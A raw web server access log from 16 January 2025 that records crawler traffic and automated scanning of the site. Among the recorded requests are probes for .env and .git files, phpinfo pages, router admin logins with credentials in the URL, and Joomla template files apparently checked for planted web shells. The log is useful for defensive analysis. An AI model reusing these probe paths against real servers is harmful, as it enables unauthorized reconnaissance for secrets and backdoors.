95.214.53.198 - - [16/Jan/2025:01:08:57 +0100] "GET /cgi-bin/getwifiattr.cgi HTTP/1.1" 404 294 "-" "Linux Gnu (cow)"
156.59.198.135 - - [16/Jan/2025:01:20:00 +0100] "GET /renault.2web.at/stats/lang/awstats-br.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:01:24:01 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/gray8b_bk.png HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.194.243.110 - - [16/Jan/2025:01:40:54 +0100] "GET / HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
156.59.198.135 - - [16/Jan/2025:01:48:52 +0100] "GET /docs/contadino/2017/RE17-000025.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:01:52:53 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011250803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:01:56:53 +0100] "GET /docs/contadino/2017/RE17-000022.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.236.132 - - [16/Jan/2025:01:58:05 +0100] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
199.45.154.157 - - [16/Jan/2025:02:09:34 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
199.45.154.157 - - [16/Jan/2025:02:09:38 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.157 - - [16/Jan/2025:02:09:38 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.157 - - [16/Jan/2025:02:09:39 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.157 - - [16/Jan/2025:02:09:40 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
118.193.33.130 - - [16/Jan/2025:02:16:12 +0100] "GET / HTTP/1.1" 200 423 "-" "curl/7.29.0"
118.193.33.130 - - [16/Jan/2025:02:16:14 +0100] "\x16\x03\x01" 400 383 "-" "-"
118.193.33.130 - - [16/Jan/2025:02:16:14 +0100] "t3 12.1.2" 400 383 "-" "-"
156.59.198.135 - - [16/Jan/2025:02:16:55 +0100] "GET /renault.2web.at/stats/lang/awstats-he.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
152.32.226.8 - - [16/Jan/2025:02:20:51 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 9_1; Win64; x64) AppleWebKit/586.47 (KHTML, like Gecko) Chrome/70.0.2990 Safari/537.36"
152.32.226.8 - - [16/Jan/2025:02:20:52 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
152.32.226.8 - - [16/Jan/2025:02:20:52 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
152.32.226.8 - - [16/Jan/2025:02:20:52 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
156.59.198.136 - - [16/Jan/2025:02:20:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005010803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:02:24:55 +0100] "GET /ed.activities.at/stats/lang/awstats-ko.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:02:28:56 +0100] "GET /docs/contadino/2017/RE17-000016.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:02:32:56 +0100] "GET /docs/contadino/2018/ANGEBOT/AG18-00003.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
51.81.215.75 - - [16/Jan/2025:02:32:59 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
51.81.111.6 - - [16/Jan/2025:02:38:54 +0100] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
185.242.226.116 - - [16/Jan/2025:02:46:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
154.212.141.161 - - [16/Jan/2025:02:49:30 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
51.91.174.244 - - [16/Jan/2025:03:05:20 +0100] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
51.91.174.244 - - [16/Jan/2025:03:05:23 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
95.214.55.226 - - [16/Jan/2025:03:05:40 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [16/Jan/2025:03:09:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104151703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
137.74.181.251 - - [16/Jan/2025:03:11:51 +0100] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
137.74.181.242 - - [16/Jan/2025:03:11:53 +0100] "GET /favicon.ico HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
156.59.198.136 - - [16/Jan/2025:03:13:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908191503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:03:17:23 +0100] "GET /docs/contadino/2017/RE17-000034.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:03:21:23 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105191703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.194.243.110 - - [16/Jan/2025:03:28:25 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.136 - - [16/Jan/2025:03:55:14 +0100] "GET /docs/contadino/2017/RE17-000035.pdf HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
4.255.101.65 - - [16/Jan/2025:03:58:01 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
178.19.175.28 - - [16/Jan/2025:04:09:31 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
178.19.175.28 - - [16/Jan/2025:04:09:32 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.135 - - [16/Jan/2025:04:15:16 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908021503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:04:19:16 +0100] "GET /docs/contadino/2017/RE17-000014.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:04:23:32 +0100] "GET /ed.activities.at/stats/lang/awstats-lt.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.181.190.248 - - [16/Jan/2025:04:29:34 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 404 371 "-" "-"
92.255.57.58 - - [16/Jan/2025:04:31:13 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
209.133.219.235 - - [16/Jan/2025:04:31:15 +0100] "GET /.env HTTP/1.1" 404 349 "-" "curl/7.74.0"
46.19.138.234 - - [16/Jan/2025:04:35:58 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [16/Jan/2025:04:51:08 +0100] "GET /ed.activities.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
64.62.197.74 - - [16/Jan/2025:04:56:38 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
64.62.197.68 - - [16/Jan/2025:04:58:44 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
64.62.197.73 - - [16/Jan/2025:04:59:19 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
64.62.197.65 - - [16/Jan/2025:04:59:55 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
64.62.197.74 - - [16/Jan/2025:04:59:57 +0100] "GET /phpinfo.php HTTP/1.1" 200 10190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:62.0) Gecko/20100101 Firefox/62.0"
64.62.197.72 - - [16/Jan/2025:04:59:59 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0"
156.59.198.135 - - [16/Jan/2025:05:02:41 +0100] "GET /ed.activities.at/stats/lang/awstats-dk.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:05:09:43 +0100] "GET /renault.2web.at/stats/lang/awstats-al.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:05:16:55 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910011103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:05:20:55 +0100] "GET /ed.activities.at/stats/lang/awstats-sr.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:05:24:55 +0100] "GET /ed.activities.at/stats/lang/awstats-ru.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.191.146 - - [16/Jan/2025:05:35:18 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.216.16.205 - - [16/Jan/2025:05:39:14 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.16.205 - - [16/Jan/2025:05:39:14 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
92.255.57.58 - - [16/Jan/2025:05:50:19 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.135 - - [16/Jan/2025:05:50:54 +0100] "GET /renault.2web.at/stats/lang/awstats-en.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.37.237 - - [16/Jan/2025:05:54:54 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [16/Jan/2025:06:16:11 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
156.59.198.136 - - [16/Jan/2025:06:18:56 +0100] "GET /docs/contadino/2017/RE17-000019.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:06:22:56 +0100] "GET /docs/contadino/2017/RE17-000018.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.42.249 - - [16/Jan/2025:06:26:57 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.25.29 - - [16/Jan/2025:06:30:57 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.124.170 - - [16/Jan/2025:06:34:57 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [16/Jan/2025:06:54:58 +0100] "GET /renault.2web.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:07:02:04 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.226 - - [16/Jan/2025:07:04:03 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
204.10.194.61 - - [16/Jan/2025:07:23:29 +0100] "GET /administrator/templates/bluestork/error.php HTTP/1.1" 404 315 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:23:35 +0100] "GET /administrator/templates/hathor/index.php HTTP/1.1" 404 315 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:23:39 +0100] "GET /administrator/templates/hathor/error.php HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:23:46 +0100] "GET /administrator/templates/isis/index.php HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:23:51 +0100] "GET /administrator/templates/isis/error.php HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:23:56 +0100] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 404 320 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:00 +0100] "GET /templates/beez/index.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:03 +0100] "GET /templates/beez3/index.php HTTP/1.1" 404 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:06 +0100] "GET /templates/beez3/error.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:10 +0100] "GET /templates/beez5/index.php HTTP/1.1" 404 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:13 +0100] "GET /templates/beez5/error.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:16 +0100] "GET /templates/beez_20/index.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:21 +0100] "GET /templates/beez_20/error.php HTTP/1.1" 404 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:24 +0100] "GET /templates/protostar/index.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:29 +0100] "GET /templates/protostar/error.php HTTP/1.1" 404 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:33 +0100] "GET /templates/atomic/index.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:37 +0100] "GET /templates/atomic/error.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:07:24:43 +0100] "GET /modules/mod_simplefileuploadv1.3/elements/Clean.php HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
221.215.192.82 - - [16/Jan/2025:07:44:29 +0100] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 378 "-" "-"
156.59.198.136 - - [16/Jan/2025:07:47:46 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001151003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:07:54:48 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/result_no.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [16/Jan/2025:08:04:10 +0100] "GET /docs/contadino/2017/RE17-000033.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
58.141.235.235 - - [16/Jan/2025:08:09:03 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
204.10.194.61 - - [16/Jan/2025:08:13:02 +0100] "GET /administrator/templates/bluestork/error.php HTTP/1.1" 404 318 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:05 +0100] "GET /administrator/templates/hathor/index.php HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:10 +0100] "GET /administrator/templates/hathor/error.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:13 +0100] "GET /administrator/templates/isis/index.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:16 +0100] "GET /administrator/templates/isis/error.php HTTP/1.1" 404 315 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:20 +0100] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 404 322 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:23 +0100] "GET /templates/beez/index.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:26 +0100] "GET /templates/beez3/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:30 +0100] "GET /templates/beez3/error.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:33 +0100] "GET /templates/beez5/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
204.10.194.61 - - [16/Jan/2025:08:13:37 +0100] "GET /templates/beez5/error.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
